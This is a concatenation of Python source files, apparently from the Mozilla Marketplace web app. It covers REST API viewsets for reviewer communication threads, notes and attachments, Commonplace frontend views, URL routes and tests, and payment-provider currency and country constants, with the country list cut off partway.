                            status=status.HTTP_403_FORBIDDEN)
class ThreadViewSet(SilentListModelMixin, RetrieveModelMixin,
DestroyModelMixin, CreateModelMixin, CommViewSet):
model = CommunicationThread
serializer_class = ThreadSerializer
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
permission_classes = (ThreadPermission,)
filter_backends = (OrderingFilter,)
cors_allowed_methods = ['get', 'post', 'patch']
    @skip_cache
    def list(self, request):
        """List threads visible to the requesting user.

        With ?app=<slug|id>: that app's threads (404 for unknown app,
        403 without permission on it), plus an `app_threads` index of
        (id, version) pairs. Without ?app: threads the user is CC'd on
        or may read as a developer of the add-on.
        """
        self.serializer_class = ThreadSerializer
        profile = request.amo_user
        # We list all the threads where the user has been CC'd.
        cc = list(profile.comm_thread_cc.values_list('thread', flat=True))
        # This gives 404 when an app with given slug/id is not found.
        data = {}
        if 'app' in request.GET:
            form = forms.AppSlugForm(request.GET)
            if not form.is_valid():
                return Response('App does not exist or no app slug given',
                                status=status.HTTP_404_NOT_FOUND)
            elif not user_has_perm_app(profile, form.cleaned_data['app']):
                return Response('You do not have permissions for this app',
                                status=status.HTTP_403_FORBIDDEN)
            queryset = CommunicationThread.objects.filter(
                addon=form.cleaned_data['app'])
            # Thread IDs and version numbers from same app.
            data['app_threads'] = list(queryset.order_by('version__version')
                                       .values('id', 'version__version'))
        else:
            # We list all the threads that user is developer of or
            # is subscribed/CC'ed to.
            addons = list(profile.addons.values_list('pk', flat=True))
            q_dev = Q(addon__in=addons, read_permission_developer=True)
            queryset = CommunicationThread.objects.filter(
                Q(pk__in=cc) | q_dev)
        self.queryset = queryset
        res = SilentListModelMixin.list(self, request)
        # Merge the app_threads index into the paginated response body.
        if res.data:
            res.data.update(data)
        return res
def retrieve(self, *args, **kwargs):
res = super(ThreadViewSet, self).retrieve(*args, **kwargs)
# Thread IDs and version numbers from same app.
res.data['app_threads'] = list(
CommunicationThread.objects.filter(addon_id=res.data['addon'])
.order_by('version__version').values('id', 'version__version'))
return res
def create(self, request, *args, **kwargs):
if not waffle.switch_is_active('comm-dashboard'):
return Response(status=status.HTTP_403_FORBIDDEN)
form = forms.CreateCommThreadForm(request.DATA)
if not form.is_valid():
return Response(
form.errors, status=status.HTTP_400_BAD_REQUEST)
app = form.cleaned_data['app']
version = form.cleaned_data['version']
thread, note = create_comm_note(
app, version, request.amo_user, form.cleaned_data['body'],
note_type=form.cleaned_data['note_type'])
return Response(
NoteSerializer(note, context={'request': self.request}).data,
status=status.HTTP_201_CREATED)
def mark_as_read(self, profile):
mark_thread_read(self.get_object(), profile)
class NoteViewSet(ListModelMixin, CreateModelMixin, RetrieveModelMixin,
                  DestroyModelMixin, CommViewSet):
    """API endpoints for the notes inside a communication thread."""
    model = CommunicationNote
    serializer_class = NoteSerializer
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    permission_classes = (NotePermission,)
    filter_backends = (OrderingFilter, ReadUnreadFilter)
    cors_allowed_methods = ['get', 'patch', 'post']

    def get_queryset(self):
        # Only notes the requesting user is allowed to see on this thread.
        # `self.comm_thread` is set elsewhere (e.g. by the permission
        # class) — presumably before this is called; confirm against
        # NotePermission.
        return CommunicationNote.objects.with_perms(
            self.request.amo_user, self.comm_thread)

    def create(self, request, *args, **kwargs):
        """Add a note to the thread given by the `thread_id` URL kwarg.
        403 unless the 'comm-dashboard' waffle switch is active."""
        if not waffle.switch_is_active('comm-dashboard'):
            return Response(status=status.HTTP_403_FORBIDDEN)
        thread = get_object_or_404(CommunicationThread, id=kwargs['thread_id'])

        # Validate note.
        form = forms.CreateCommNoteForm(request.DATA)
        if not form.is_valid():
            return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)

        # Create notes.
        thread, note = create_comm_note(
            thread.addon, thread.version, self.request.amo_user,
            form.cleaned_data['body'],
            note_type=form.cleaned_data['note_type'])

        return Response(
            NoteSerializer(note, context={'request': request}).data,
            status=status.HTTP_201_CREATED)

    def mark_as_read(self, profile):
        """Record that `profile` has read this note (PATCH is__read hook)."""
        CommunicationNoteRead.objects.get_or_create(note=self.get_object(),
                                                    user=profile)
class AttachmentViewSet(CreateModelMixin, CommViewSet):
    """Create and download file attachments on communication notes."""
    model = CommAttachment
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    permission_classes = (AttachmentPermission,)
    cors_allowed_methods = ['get', 'post']

    def get(self, request, note_id, pk, *args, **kwargs):
        """Stream attachment `pk` to an authorized requester."""
        attach = get_object_or_404(CommAttachment, pk=pk)
        self.check_object_permissions(request, attach)

        full_path = os.path.join(settings.REVIEWER_ATTACHMENTS_PATH,
                                 attach.filepath)

        # Force a download for anything that is not an image.
        content_type = 'application/force-download'
        if attach.is_image():
            content_type = 'image'
        return HttpResponseSendFile(
            request, full_path, content_type=content_type)

    def create(self, request, note_id, *args, **kwargs):
        """Attach uploaded files (at most comm.MAX_ATTACH) to a note.

        Only the note's author may attach files; returns the serialized
        note with a 201 on success.
        """
        note = get_object_or_404(CommunicationNote, id=note_id)
        if not note.author.id == request.amo_user.id:
            return Response(
                [{'non_field_errors':
                  'You must be owner of the note to attach a file.'}],
                status=status.HTTP_403_FORBIDDEN)

        # Validate attachment.
        attachment_formset = None
        if request.FILES:
            data = request.POST.copy()
            data.update({
                # One form per uploaded '-attachment' file.
                'form-TOTAL_FORMS': len([k for k in request.FILES if
                                         k.endswith('-attachment')]),
                'form-INITIAL_FORMS': 0,
                'form-MAX_NUM_FORMS': comm.MAX_ATTACH
            })

            if data['form-TOTAL_FORMS'] > comm.MAX_ATTACH:
                # TODO: use formset validate_max=True in Django 1.6.
                # Bug fix: the '%s' placeholder was never interpolated, so
                # clients previously saw a literal '%s' in the message.
                return Response(
                    [{'non_field_errors':
                      'Maximum of %s files can be attached.'
                      % comm.MAX_ATTACH}],
                    status=status.HTTP_400_BAD_REQUEST)

            attachment_formset = forms.CommAttachmentFormSet(
                data=data, files=request.FILES or None)
            if not attachment_formset.is_valid():
                return Response(attachment_formset.errors,
                                status=status.HTTP_400_BAD_REQUEST)
        else:
            return Response([{'non_field_errors': 'No files were attached.'}],
                            status=status.HTTP_400_BAD_REQUEST)

        # Create attachment.
        if attachment_formset:
            create_attachments(note, attachment_formset)

        return Response(
            NoteSerializer(note, context={'request': request}).data,
            status=status.HTTP_201_CREATED)

    def mark_as_read(self, profile):
        """Record that `profile` has read the note being acted on."""
        CommunicationNoteRead.objects.get_or_create(note=self.get_object(),
                                                    user=profile)
class ThreadCCViewSet(DestroyModelMixin, CommViewSet):
    """DELETE-only endpoint for removing the requesting user from a
    thread's CC list."""
    model = CommunicationThreadCC
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    permission_classes = ()
    cors_allowed_methods = ['delete']

    def destroy(self, request, **kw):
        # Validate the URL kwargs (thread pk) before touching the DB.
        form = forms.UnCCForm(kw)
        if not form.is_valid():
            return Response(status=status.HTTP_400_BAD_REQUEST)

        cc_rows = CommunicationThreadCC.objects.filter(
            thread=form.cleaned_data['pk'], user=request.amo_user)
        cc_rows.delete()

        # NOTE(review): a 204 response carries a body here — most clients
        # will drop it; confirm whether the message is ever surfaced.
        return Response("Successfully un-cc'ed from thread.",
                        status=status.HTTP_204_NO_CONTENT)
@api_view(['POST'])
@authentication_classes((NoAuthentication,))
@permission_classes((EmailCreationPermission,))
def post_email(request):
    """Accept an inbound comm email (POSTed body) and queue it for parsing."""
    body = request.POST.get('body')
    if not body:
        raise ParseError(
            detail='email_body not present in the POST data.')

    # Parsing/handling happens out-of-band in a celery task.
    consume_email.apply_async((body,))
    return Response(status=status.HTTP_201_CREATED)
########NEW FILE########
__FILENAME__ = test_views
from django.conf import settings
import mock
from nose import SkipTest
from nose.tools import eq_
import amo.tests
from amo.utils import reverse
class TestCommonplace(amo.tests.TestCase):
    """Tests that each Commonplace URL renders the shared index template
    with the right repo, and that the Persona shim is included/omitted."""

    def test_fireplace(self):
        res = self.client.get('/server.html')
        self.assertTemplateUsed(res, 'commonplace/index.html')
        self.assertEquals(res.context['repo'], 'fireplace')

    def test_commbadge(self):
        res = self.client.get('/comm/')
        self.assertTemplateUsed(res, 'commonplace/index.html')
        self.assertEquals(res.context['repo'], 'commbadge')

    def test_rocketfuel(self):
        res = self.client.get('/curation/')
        self.assertTemplateUsed(res, 'commonplace/index.html')
        self.assertEquals(res.context['repo'], 'rocketfuel')

    def test_fireplace_persona_js_not_included_on_firefox_os(self):
        # Temporarily enabling include.js shim (bug 992334).
        # Skipped while the shim override in the view forces include_persona
        # on; the loop below is intentionally unreachable until then.
        raise SkipTest
        for url in ('/server.html?mccs=blah',
                    '/server.html?mcc=blah&mnc=blah',
                    '/server.html?nativepersona=true'):
            res = self.client.get(url)
            self.assertNotContains(res, 'login.persona.org/include.js')

    def test_fireplace_persona_js_is_included_elsewhere(self):
        for url in ('/server.html', '/server.html?mcc=blah'):
            res = self.client.get(url)
            self.assertContains(res, 'login.persona.org/include.js" async')

    def test_rocketfuel_persona_js_is_included(self):
        for url in ('/curation/', '/curation/?nativepersona=true'):
            res = self.client.get(url)
            self.assertContains(res, 'login.persona.org/include.js" defer')
class TestAppcacheManifest(amo.tests.TestCase):
    """Tests for the appcache manifest endpoint; only meaningful when
    'fireplace' is configured as appcache-enabled."""

    def test_no_repo(self):
        if 'fireplace' not in settings.COMMONPLACE_REPOS_APPCACHED:
            raise SkipTest
        # Missing ?repo= param -> 404.
        res = self.client.get(reverse('commonplace.appcache'))
        eq_(res.status_code, 404)

    def test_bad_repo(self):
        if 'fireplace' not in settings.COMMONPLACE_REPOS_APPCACHED:
            raise SkipTest
        # rocketfuel is not appcache-enabled -> 404.
        res = self.client.get(reverse('commonplace.appcache'),
                              {'repo': 'rocketfuel'})
        eq_(res.status_code, 404)

    @mock.patch('mkt.commonplace.views.get_build_id', new=lambda x: 'p00p')
    @mock.patch('mkt.commonplace.views.get_imgurls')
    def test_good_repo(self, get_imgurls_mock):
        if 'fireplace' not in settings.COMMONPLACE_REPOS_APPCACHED:
            raise SkipTest
        img = '/media/img/icons/eggs/h1.gif'
        get_imgurls_mock.return_value = [img]
        res = self.client.get(reverse('commonplace.appcache'),
                              {'repo': 'fireplace'})
        eq_(res.status_code, 200)
        # The mocked build id must appear in the manifest header.
        assert '# BUILD_ID p00p' in res.content
        # Image URLs get rewritten to the repo-specific media path.
        img = img.replace('/media/', '/media/fireplace/')
        assert img + '\n' in res.content
class TestIFrameInstall(amo.tests.TestCase):
    """Smoke test for the iframe-install page."""

    def test_basic(self):
        response = self.client.get(reverse('commonplace.iframe-install'))
        eq_(response.status_code, 200)
########NEW FILE########
__FILENAME__ = urls
from django.conf import settings
from django.conf.urls import include, patterns, url
import amo
from . import views
def fireplace_route(path, name=None):
    """
    Helper function for building Fireplace URLs. `path` is the URL route,
    and `name` (if specified) is the name given to the route.
    """
    extra = {'name': name} if name else {}
    return url('^%s$' % path, views.commonplace, {'repo': 'fireplace'},
               **extra)
# Rating sub-routes nested under a single review.
fireplace_reviews_patterns = patterns('',
    fireplace_route('flag', 'ratings.flag'),
    fireplace_route('delete', 'ratings.delete'),
)

# Routes nested under a single app's detail page.
fireplace_app_patterns = patterns('',
    fireplace_route('', 'detail'),
    fireplace_route('abuse', 'detail.abuse'),
    fireplace_route('privacy', 'detail.privacy'),
    fireplace_route('reviews/', 'ratings.list'),
    fireplace_route('reviews/add', 'ratings.add'),
    url('^(?P<review_id>\d+)/', include(fireplace_reviews_patterns)),
)

urlpatterns = patterns('',
    # Fireplace:
    url('^$', views.commonplace, {'repo': 'fireplace'}, name='home'),
    url('^server.html$', views.commonplace, {'repo': 'fireplace'},
        name='commonplace.fireplace'),
    # Bare (regex, include) tuple — accepted by old-style patterns().
    ('^app/%s/' % amo.APP_SLUG, include(fireplace_app_patterns)),
    url(r'^iframe-install.html/$', views.iframe_install,
        name='commonplace.iframe-install'),

    # Commbadge:
    url('^comm/app/%s$' % amo.APP_SLUG, views.commonplace,
        {'repo': 'commbadge'},
        name='commonplace.commbadge.app_dashboard'),
    url('^comm/thread/(?P<thread_id>\d+)$', views.commonplace,
        {'repo': 'commbadge'},
        name='commonplace.commbadge.show_thread'),
    # Catch-all must come after the more specific comm routes above.
    url('^comm/.*$', views.commonplace, {'repo': 'commbadge'},
        name='commonplace.commbadge'),

    # Rocketfuel:
    url('^curation/.*$', views.commonplace, {'repo': 'rocketfuel'},
        name='commonplace.rocketfuel'),

    # Stats:
    url('^statistics/app/%s$' % amo.APP_SLUG, views.commonplace,
        {'repo': 'marketplace-stats'},
        name='commonplace.stats.app_dashboard'),
    url('^statistics/.*$', views.commonplace, {'repo': 'marketplace-stats'},
        name='commonplace.stats'),

    url('^manifest.appcache$', views.appcache_manifest,
        name='commonplace.appcache'),
)

if settings.DEBUG:
    # More Fireplace stuff, only for local dev:
    urlpatterns += patterns('',
        fireplace_route('category/.*'),
        fireplace_route('collection/.*'),
        fireplace_route('debug'),
        fireplace_route('feedback'),
        fireplace_route('privacy-policy'),
        fireplace_route('purchases'),
        fireplace_route('search/?'),
        fireplace_route('settings'),
        fireplace_route('terms-of-use'),
        fireplace_route('tests'),
    )
########NEW FILE########
__FILENAME__ = views
import datetime
import importlib
import os
from urlparse import urlparse
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.http import HttpResponse, HttpResponseNotFound
from django.shortcuts import render
import jingo
import jinja2
import newrelic.agent
from cache_nuggets.lib import memoize
def get_build_id(repo):
    """Return a cache-busting build id for *repo*'s minified assets.

    Lookup order:
      1. ``BUILD_ID`` from the compiled ``build_<repo>.py`` module.
      2. The contents of ``<MEDIA_ROOT>/<repo>/build_id.txt``.
      3. ``BUILD_ID_CSS`` from jingo-minify's ``build.py``.
      4. The literal string ``'dev'``.
    """
    try:
        # This is where the `build_{repo}.py` files get written to after
        # compiling and minifying our assets.
        # Get the `BUILD_ID` from `build_{repo}.py` and use that to
        # cache-bust the assets for this repo's CSS/JS minified bundles.
        module = 'build_%s' % repo
        return importlib.import_module(module).BUILD_ID
    except (ImportError, AttributeError):
        try:
            build_id_fn = os.path.join(settings.MEDIA_ROOT, repo,
                                       'build_id.txt')
            with storage.open(build_id_fn) as fh:
                return fh.read()
        except Exception:
            # Fix: was a bare `except:`, which also swallowed SystemExit and
            # KeyboardInterrupt. Exception keeps the best-effort fallback
            # without masking interpreter-level signals.
            # Either `build_{repo}.py` does not exist or `build_{repo}.py`
            # exists but does not contain `BUILD_ID`. Fall back to
            # `BUILD_ID_CSS` which is written to `build.py` by jingo-minify.
            try:
                from build import BUILD_ID_CSS
                return BUILD_ID_CSS
            except ImportError:
                return 'dev'
def get_imgurls(repo):
    """Return the de-duplicated image URL lines from the repo's imgurls.txt."""
    path = os.path.join(settings.MEDIA_ROOT, repo, 'imgurls.txt')
    with storage.open(path) as fh:
        lines = fh.readlines()
    # Order is not significant; duplicates are dropped.
    return list(set(lines))
def commonplace(request, repo, **kwargs):
    """Render the single-page-app shell (`commonplace/index.html`) for one
    of the Commonplace frontend repos; 404 for unknown repos.

    Extra captured URL kwargs are accepted and ignored.
    """
    if repo not in settings.COMMONPLACE_REPOS:
        # Bug fix: previously returned the HttpResponseNotFound *class*
        # instead of an instance (cf. the correct call in
        # appcache_manifest), which is not a valid view return value.
        return HttpResponseNotFound()

    BUILD_ID = get_build_id(repo)
    site_settings = {
        'persona_unverified_issuer': settings.BROWSERID_DOMAIN
    }

    ua = request.META.get('HTTP_USER_AGENT', '').lower()

    # Fireplace on-device requests (native persona / carrier params) would
    # normally skip the Persona shim...
    include_persona = True
    if repo == 'fireplace':
        if (request.GET.get('nativepersona') or
            'mccs' in request.GET or
            ('mcc' in request.GET and 'mnc' in request.GET)):
            include_persona = False

    # Temporarily enabling include.js shim (bug 992334).
    include_persona = True

    ctx = {
        'BUILD_ID': BUILD_ID,
        'appcache': repo in settings.COMMONPLACE_REPOS_APPCACHED,
        'include_persona': include_persona,
        'repo': repo,
        'robots': 'googlebot' in ua,
        'site_settings': site_settings,
        'newrelic_header': newrelic.agent.get_browser_timing_header,
        'newrelic_footer': newrelic.agent.get_browser_timing_footer,
    }

    # Expose the media origin when MEDIA_URL is absolute (has a host).
    media_url = urlparse(settings.MEDIA_URL)
    if media_url.netloc:
        ctx['media_origin'] = media_url.scheme + '://' + media_url.netloc

    return render(request, 'commonplace/index.html', ctx)
def appcache_manifest(request):
    """Serves the appcache manifest."""
    repo = request.GET.get('repo')
    if not repo or repo not in settings.COMMONPLACE_REPOS_APPCACHED:
        # Missing/empty ?repo= or a repo that is not appcache-enabled.
        return HttpResponseNotFound()
    return HttpResponse(appcache_manifest_template(repo),
                        mimetype='text/cache-manifest')
@memoize('appcache-manifest-template')
def appcache_manifest_template(repo):
    """Render the appcache manifest body for `repo`.

    Memoized under 'appcache-manifest-template', so the BUILD_ID and
    timestamp are frozen until the cached value expires or is cleared.
    """
    ctx = {
        'BUILD_ID': get_build_id(repo),
        'imgurls': get_imgurls(repo),
        'repo': repo,
        'timestamp': datetime.datetime.now(),
    }
    t = jingo.env.get_template('commonplace/manifest.appcache').render(ctx)
    # Markup + unicode() (Python 2) yields a plain unicode string result.
    return unicode(jinja2.Markup(t))
def iframe_install(request):
    """Render the page used for installing apps from within an iframe."""
    template = 'commonplace/iframe-install.html'
    return render(request, template)
########NEW FILE########
__FILENAME__ = apps
from tower import ugettext_lazy as _
# Install type ids; human-readable labels are in INSTALL_TYPES below.
INSTALL_TYPE_USER = 0
INSTALL_TYPE_REVIEWER = 1
INSTALL_TYPE_DEVELOPER = 2

# Localizable display labels for each install type id.
INSTALL_TYPES = {
    INSTALL_TYPE_USER: _('User'),
    INSTALL_TYPE_REVIEWER: _('Reviewer'),
    INSTALL_TYPE_DEVELOPER: _('Developer')
}
########NEW FILE########
__FILENAME__ = bango
# -*- coding: utf8 -*-
from lib.constants import ALL_CURRENCIES
from tower import ugettext_lazy as _lazy
# From page 10 of the Mozilla Exporter API docs v1.0.0
BANGO_CURRENCIES = ['AUD', 'CAD', 'CHF', 'COP', 'DKK', 'EGP', 'EUR', 'GBP',
                    'IDR', 'MXN', 'MYR', 'NOK', 'NZD', 'PHP', 'PLN', 'QAR',
                    'SEK', 'SGD', 'THB', 'USD', 'ZAR']
# Rebind the name: the code list becomes a {code: display name} mapping.
BANGO_CURRENCIES = dict((k, ALL_CURRENCIES[k]) for k in BANGO_CURRENCIES)

# Currencies Bango can pay out in, as (code, display name) choice pairs.
BANGO_OUTPAYMENT_CURRENCIES = ['EUR', 'GBP', 'USD']
BANGO_OUTPAYMENT_CURRENCIES = [(k, ALL_CURRENCIES[k])
                               for k in BANGO_OUTPAYMENT_CURRENCIES]
# Country choices accepted by Bango, keyed by ISO 3166-1 alpha-3 code.
# Fixes three truncated labels ('Denmark Do' -> 'Denmark',
# 'Liechtenstei' -> 'Liechtenstein', 'Senega' -> 'Senegal').
# NOTE(review): several other names are deliberately shortened (e.g.
# "Korea, Democratic People's Rep") — presumably to fit display limits;
# left as-is to avoid churning translation msgids. Confirm with l10n.
BANGO_COUNTRIES = [
    ('AFG', _lazy(u'Afghanistan')),
    ('ALA', _lazy(u'Åland Islands')),
    ('ALB', _lazy(u'Albania')),
    ('DZA', _lazy(u'Algeria')),
    ('ASM', _lazy(u'American Samoa')),
    ('AND', _lazy(u'Andorra')),
    ('AGO', _lazy(u'Angola')),
    ('AIA', _lazy(u'Anguilla')),
    ('ATA', _lazy(u'Antarctica')),
    ('ATG', _lazy(u'Antigua and Barbuda')),
    ('ARG', _lazy(u'Argentina')),
    ('ARM', _lazy(u'Armenia')),
    ('ABW', _lazy(u'Aruba')),
    ('AUS', _lazy(u'Australia')),
    ('AUT', _lazy(u'Austria')),
    ('AZE', _lazy(u'Azerbaijan')),
    ('BHS', _lazy(u'Bahamas')),
    ('BHR', _lazy(u'Bahrain')),
    ('BGD', _lazy(u'Bangladesh')),
    ('BRB', _lazy(u'Barbados')),
    ('BLR', _lazy(u'Belarus')),
    ('BEL', _lazy(u'Belgium')),
    ('BLZ', _lazy(u'Belize')),
    ('BEN', _lazy(u'Benin')),
    ('BMU', _lazy(u'Bermuda')),
    ('BTN', _lazy(u'Bhutan')),
    ('BOL', _lazy(u'Bolivia')),
    ('BES', _lazy(u'Bonaire, Saint Eustatius and Saba')),
    ('BIH', _lazy(u'Bosnia and Herzegovina')),
    ('BWA', _lazy(u'Botswana')),
    ('BVT', _lazy(u'Bouvet Island')),
    ('BRA', _lazy(u'Brazil')),
    ('IOT', _lazy(u'British Indian Ocean Territory')),
    ('BRN', _lazy(u'Brunei Darussalam')),
    ('BGR', _lazy(u'Bulgaria')),
    ('BFA', _lazy(u'Burkina Faso')),
    ('BDI', _lazy(u'Burundi')),
    ('KHM', _lazy(u'Cambodia')),
    ('CMR', _lazy(u'Cameroon')),
    ('CAN', _lazy(u'Canada')),
    ('CPV', _lazy(u'Cape Verde')),
    ('CYM', _lazy(u'Cayman Islands')),
    ('CAF', _lazy(u'Central African Republic')),
    ('TCD', _lazy(u'Chad')),
    ('CHL', _lazy(u'Chile')),
    ('CHN', _lazy(u'China')),
    ('CXR', _lazy(u'Christmas Island')),
    ('CCK', _lazy(u'Cocos (Keeling) Islands')),
    ('COL', _lazy(u'Colombia')),
    ('COM', _lazy(u'Comoros')),
    ('COG', _lazy(u'Congo')),
    ('COD', _lazy(u'Congo, Democratic Republic')),
    ('COK', _lazy(u'Cook Islands')),
    ('CRI', _lazy(u'Costa Rica')),
    ('CIV', _lazy(u"Côte d'Ivoire")),
    ('HRV', _lazy(u'Croatia')),
    ('CUB', _lazy(u'Cuba')),
    ('CUW', _lazy(u'Curaçao')),
    ('CYP', _lazy(u'Cyprus')),
    ('CZE', _lazy(u'Czech Republic')),
    ('DNK', _lazy(u'Denmark')),
    ('DJI', _lazy(u'Djibouti')),
    ('DMA', _lazy(u'Dominica')),
    ('DOM', _lazy(u'Dominican Republic')),
    ('ECU', _lazy(u'Ecuador')),
    ('EGY', _lazy(u'Egypt')),
    ('SLV', _lazy(u'El Salvador')),
    ('GNQ', _lazy(u'Equatorial Guinea')),
    ('ERI', _lazy(u'Eritrea')),
    ('EST', _lazy(u'Estonia')),
    ('ETH', _lazy(u'Ethiopia')),
    ('FLK', _lazy(u'Falkland Islands (Malvinas)')),
    ('FRO', _lazy(u'Faroe Islands')),
    ('FJI', _lazy(u'Fiji')),
    ('FIN', _lazy(u'Finland')),
    ('FRA', _lazy(u'France')),
    ('GUF', _lazy(u'French Guiana')),
    ('PYF', _lazy(u'French Polynesia')),
    ('ATF', _lazy(u'French Southern Territories')),
    ('GAB', _lazy(u'Gabon')),
    ('GMB', _lazy(u'Gambia')),
    ('GEO', _lazy(u'Georgia')),
    ('DEU', _lazy(u'Germany')),
    ('GHA', _lazy(u'Ghana')),
    ('GIB', _lazy(u'Gibraltar')),
    ('GRC', _lazy(u'Greece')),
    ('GRL', _lazy(u'Greenland')),
    ('GRD', _lazy(u'Grenada')),
    ('GLP', _lazy(u'Guadeloupe')),
    ('GUM', _lazy(u'Guam')),
    ('GTM', _lazy(u'Guatemala')),
    ('GGY', _lazy(u'Guernsey')),
    ('GIN', _lazy(u'Guinea')),
    ('GNB', _lazy(u'Guinea-Bissau')),
    ('GUY', _lazy(u'Guyana')),
    ('HTI', _lazy(u'Haiti')),
    ('HMD', _lazy(u'Heard and McDonald Islands')),
    ('VAT', _lazy(u'Holy See (Vatican City State)')),
    ('HND', _lazy(u'Honduras')),
    ('HKG', _lazy(u'Hong Kong')),
    ('HUN', _lazy(u'Hungary')),
    ('ISL', _lazy(u'Iceland')),
    ('IND', _lazy(u'India')),
    ('IDN', _lazy(u'Indonesia')),
    ('IRN', _lazy(u'Iran, Islamic Republic of')),
    ('IRQ', _lazy(u'Iraq')),
    ('IRL', _lazy(u'Ireland')),
    ('IMN', _lazy(u'Isle of Man')),
    ('ISR', _lazy(u'Israel')),
    ('ITA', _lazy(u'Italy')),
    ('JAM', _lazy(u'Jamaica')),
    ('JPN', _lazy(u'Japan')),
    ('JEY', _lazy(u'Jersey')),
    ('JOR', _lazy(u'Jordan')),
    ('KAZ', _lazy(u'Kazakhstan')),
    ('KEN', _lazy(u'Kenya')),
    ('KIR', _lazy(u'Kiribati')),
    ('PRK', _lazy(u"Korea, Democratic People's Rep")),
    ('KOR', _lazy(u'Korea, Republic of')),
    ('KOS', _lazy(u'Kosovo')),
    ('KWT', _lazy(u'Kuwait')),
    ('KGZ', _lazy(u'Kyrgyzstan')),
    ('LAO', _lazy(u"Lao People's Democratic Rep")),
    ('LVA', _lazy(u'Latvia')),
    ('LBN', _lazy(u'Lebanon')),
    ('LSO', _lazy(u'Lesotho')),
    ('LBR', _lazy(u'Liberia')),
    ('LBY', _lazy(u'Libyan Arab Jamahiriya')),
    ('LIE', _lazy(u'Liechtenstein')),
    ('LTU', _lazy(u'Lithuania')),
    ('LUX', _lazy(u'Luxembourg')),
    ('MAC', _lazy(u'Macao')),
    ('MKD', _lazy(u'Macedonia, Former Yugoslav Rep')),
    ('MDG', _lazy(u'Madagascar')),
    ('MWI', _lazy(u'Malawi')),
    ('MYS', _lazy(u'Malaysia')),
    ('MDV', _lazy(u'Maldives')),
    ('MLI', _lazy(u'Mali')),
    ('MLT', _lazy(u'Malta')),
    ('MHL', _lazy(u'Marshall Islands')),
    ('MTQ', _lazy(u'Martinique')),
    ('MRT', _lazy(u'Mauritania')),
    ('MUS', _lazy(u'Mauritius')),
    ('MYT', _lazy(u'Mayotte')),
    ('MEX', _lazy(u'Mexico')),
    ('FSM', _lazy(u'Micronesia, Federated States of')),
    ('MDA', _lazy(u'Moldova, Republic of')),
    ('MCO', _lazy(u'Monaco')),
    ('MNG', _lazy(u'Mongolia')),
    ('MNE', _lazy(u'Montenegro')),
    ('MSR', _lazy(u'Montserrat')),
    ('MAR', _lazy(u'Morocco')),
    ('MOZ', _lazy(u'Mozambique')),
    ('MMR', _lazy(u'Myanmar')),
    ('NAM', _lazy(u'Namibia')),
    ('NRU', _lazy(u'Nauru')),
    ('NPL', _lazy(u'Nepal')),
    ('NLD', _lazy(u'Netherlands')),
    ('NCL', _lazy(u'New Caledonia')),
    ('NZL', _lazy(u'New Zealand')),
    ('NIC', _lazy(u'Nicaragua')),
    ('NER', _lazy(u'Niger')),
    ('NGA', _lazy(u'Nigeria')),
    ('NIU', _lazy(u'Niue')),
    ('NFK', _lazy(u'Norfolk Island')),
    ('MNP', _lazy(u'Northern Mariana Islands')),
    ('NOR', _lazy(u'Norway')),
    ('OMN', _lazy(u'Oman')),
    ('PAK', _lazy(u'Pakistan')),
    ('PLW', _lazy(u'Palau')),
    ('PSE', _lazy(u'Palestinian Territory, Occupied')),
    ('PAN', _lazy(u'Panama')),
    ('PNG', _lazy(u'Papua New Guinea')),
    ('PRY', _lazy(u'Paraguay')),
    ('PER', _lazy(u'Peru')),
    ('PHL', _lazy(u'Philippines')),
    ('PCN', _lazy(u'Pitcairn')),
    ('POL', _lazy(u'Poland')),
    ('PRT', _lazy(u'Portugal')),
    ('PRI', _lazy(u'Puerto Rico')),
    ('QAT', _lazy(u'Qatar')),
    ('REU', _lazy(u'Réunion')),
    ('ROU', _lazy(u'Romania')),
    ('RUS', _lazy(u'Russian Federation')),
    ('RWA', _lazy(u'Rwanda')),
    ('BLM', _lazy(u'Saint Barthélemy')),
    ('SHN', _lazy(u'Saint Helena')),
    ('KNA', _lazy(u'Saint Kitts and Nevis')),
    ('LCA', _lazy(u'Saint Lucia')),
    ('MAF', _lazy(u'Saint Martin')),
    ('SPM', _lazy(u'Saint Pierre and Miquelon')),
    ('VCT', _lazy(u'Saint Vincent and the Grenadines')),
    ('WSM', _lazy(u'Samoa')),
    ('SMR', _lazy(u'San Marino')),
    ('STP', _lazy(u'Sao Tome and Principe')),
    ('SAU', _lazy(u'Saudi Arabia')),
    ('SEN', _lazy(u'Senegal')),
    ('SRB', _lazy(u'Serbia')),
    ('SCG', _lazy(u'Serbia and Montenegro')),
    ('SYC', _lazy(u'Seychelles')),
    ('SLE', _lazy(u'Sierra Leone')),
    ('SGP', _lazy(u'Singapore')),
    ('SXM', _lazy(u'Sint Maarten (Dutch part)')),
    ('SVK', _lazy(u'Slovakia')),
    ('SVN', _lazy(u'Slovenia')),
    ('SLB', _lazy(u'Solomon Islands')),
    ('SOM', _lazy(u'Somalia')),
    ('ZAF', _lazy(u'South Africa')),
    ('SGS', _lazy(u'South Georgia and the South Sandwich Islands')),
    ('SSD', _lazy(u'South Sudan')),
    ('ESP', _lazy(u'Spain')),
    ('LKA', _lazy(u'Sri Lanka')),
    ('SDN', _lazy(u'Sudan')),
    ('SUR', _lazy(u'Suriname')),
    ('SJM', _lazy(u'Svalbard and Jan Mayen')),
    ('SWZ', _lazy(u'Swaziland')),
    ('SWE', _lazy(u'Sweden')),
    ('CHE', _lazy(u'Switzerland')),
    ('SYR', _lazy(u'Syrian Arab Republic')),
    ('TWN', _lazy(u'Taiwan, Province of China')),
    ('TJK', _lazy(u'Tajikistan')),
    ('TZA', _lazy(u'Tanzania, United Republic of')),
    ('THA', _lazy(u'Thailand')),
    ('TLS', _lazy(u'Timor-Leste')),
    ('TGO', _lazy(u'Togo')),
    ('TKL', _lazy(u'Tokelau')),
    ('TON', _lazy(u'Tonga')),
    ('TTO', _lazy(u'Trinidad and Tobago')),
    ('TUN', _lazy(u'Tunisia')),
    ('TUR', _lazy(u'Turkey')),
    ('TKM', _lazy(u'Turkmenistan')),
    ('TCA', _lazy(u'Turks and Caicos Islands')),
    ('TUV', _lazy(u'Tuvalu')),
    ('UGA', _lazy(u'Uganda')),
    ('UKR', _lazy(u'Ukraine')),
    ('ARE', _lazy(u'United Arab Emirates')),
